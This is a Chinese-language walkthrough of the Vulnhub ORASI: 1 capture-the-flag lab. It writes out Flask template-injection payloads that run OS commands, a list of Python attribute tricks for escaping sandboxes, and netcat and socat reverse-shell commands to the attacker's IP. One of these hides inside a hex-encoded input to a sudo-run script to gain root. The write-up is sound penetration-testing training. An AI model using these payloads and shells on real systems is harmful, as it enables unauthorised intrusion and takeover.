Vulnhub 靶场 ORASI: 1
前期准备:
靶机地址:https://www.vulnhub.com/entry/orasi-1,660/
kali攻击机ip:192.168.11.128
靶机ip:192.168.11.162
一、信息收集
1.使用nmap对目标靶机进行扫描
开了21、22、80和5000端口。
2. 21端口
匿名登陆:
有个 url 文件,下载下来看一下:
是个 ELF 文件,尝试运行:
没发现什么。IDA 打开,发现 main 中的 insert 函数会调用几个值:
直接看寄存器的值:
得到:/sh4d0w$s,文件名也提示了这是个路劲。
3. 80端口、5000端口
在 80 端口上:
访问一下刚才发现的路径:
直接 404,试一下 5000 端口上:
返回 no input,应该是要输入什么东西,想到的就是文件包含命令执行之类的,不过没有参数,模糊测试一下(扫描时要在sh4d0w$s的 $ 前加 \ 转义),字典的话想到 80 端口上的 “6 6 1337leet”,想了想应该是让用 crunch 生成字典:
crunch 6 6 1337leet -o wordlist.txt
做一下模糊测试:
l333tt 可以,查看一下:
发现直接返回了我输入的路劲,尝试了其他命令也是:
并且发现服务器用的 python:
二、漏洞利用
猜测应该是 SSTI (服务器模板注入)。测试一下:
确实是 SSTI({{}}在模板引擎中作为变量包裹标识符,模板引擎在渲染的时候会把{{}}包裹的内容当做变量解析替换。比如{{1+1}}会被解析成2。如此一来就可以实现如同sql注入一样的注入漏洞。),CTF平台上也有类似的题,bugku 等,使用类来进行注入:
__class__ 类的一个内置属性,表示实例对象的类。
__base__ 类型对象的直接基类
__bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__
__mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。
__subclasses__() 返回这个类的子类集合,Each class keeps a list of weak references to its immediate subclasses. This method returns a list of all those references still alive. The list is in definition order.
__init__ 初始化类,返回的类型是function
__globals__ 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
__dic__ 类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里
__getattribute__() 实例、类、函数都具有的__getattribute__魔术方法。事实上,在实例化的对象进行.操作的时候(形如:a.xxx/a.xxx()),都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。
__getitem__() 调用字典中的键值,其实就是调用这个魔术方法,比如a['b'],就是a.__getitem__('b')
__builtins__ 内建名称空间,内建名称空间有许多名字到对象之间映射,而这些名字其实就是内建函数的名称,对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了,百度都有。
__import__ 动态加载类和函数,也就是导入模块,经常用于导入os模块,__import__('os').popen('ls').read()]
__str__() 返回描写这个对象的字符串,可以理解成就是打印出来。
url_for flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
get_flashed_messages flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
lipsum flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.__globals__['os'].popen('ls').read()}}
current_app 应用上下文,一个全局变量。
request 可以用于获取字符串来绕过,包括下面这些,引用一下羽师傅的。此外,同样可以获取open函数:request.__init__.__globals__['__builtins__'].open('/proc\self\fd/3').read()
request.args.x1 get传参
request.values.x1 所有参数
request.cookies cookies参数
request.headers 请求头参数
request.form.x1 post传参 (Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)
request.data post传参 (Content-Type:a/b)
request.json post传json (Content-Type: application/json)
config 当前application的所有配置。此外,也可以这样{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
g {{g}}得到<flask.g of 'flask_ssti'>
构造payload:{{ config.__class__.__init__.__globals__['os'].popen('ls -la').read() }}
能正常运行系统命令,查看有没有 nc:
有 nc,用 nc 进行反弹 shell:
nc 监听:
监听成功,升级一下 shell。
三、提权
查看权限:
发现能用 /bin/php /home/kori/jail.php,查看一下 /home/kori/jail.php:
脚本会执行命令。但是,如果命令匹配某些关键字,如 bash、eval、nc 等,则会显示 “Restricted characters has been used”。并且它还限制使用“/”。发现靶机上有 socat,那用socat获取 kori 用户:
sudo -u kori /bin/php /home/kori/jail.php socat exec:'sh',pty,stderr,setsid,sigint,sane tcp:192.168.11.128:1235
nc 监听:
查看一下 kori 的权限:
能复制 irida/irida.apk 到 kori 中,那先复制过来看看:
发现不行,虽然 irida 用户能复制 irida.apk,不过他并没有权限访问 kori 的家目录,先把 kori 的家目录赋予其他用户访问的权限:
不过虽然复制过来了,但是它的所属还是 irida,还是访问不了,那只能先创建一个同名文件,然后再复制过来:
现在能访问这个文件了,因为是个 apk 文件,所以我把它从靶机上弄了下来用 AndroidKiller 进行逆向分析:
在 LoginDataSource.smail 中发现有用户名密码,右键查看 jd-gui 打开(要有 jd-gui 软件):
观察可以发现参数一是 irida,参数二采取了一种密码保护,保护机制是:1#2#3#4#5,对应下面 0.1.2.3.4 的字符串,并且每一个中间都加 “.”,这个密码应该就是 irida 用户的密码,拼接后的结果是:eye.of.the.tiger.(),尝试切换失败,其实在 vulnhub 中的靶机页面就有提示:
有一个点是没有用的,根据上面的密码,判断 () 前的 . 应该是要去掉的,所以最后的密码是:eye.of.the.tiger()。切换诚 irida 用户:
切换成功,查看文件:
应该是个 flag,查看权限:
发现能运行 /root/oras.py 这个 python3 脚本,尝试运行一下:
要输入,我尝试输入id,结果报错了,根据报错提示发现应该是输入十六进制然后返回字符串,试试输入 16 进制:
返回了 NameError: name 'aaaa' is not defined,这是当 python 脚本运行错误的类的时候报的错,也就是能运行,那尝试往python中添加反弹 shell:
python3 -c "print(b\"__import__('os').system('nc -e /bin/bash 192.168.11.128 1236')\".hex())" | sudo python3 /root/oras.py
nc 监听:
成功得到 root 用户,查看 flag:
完成。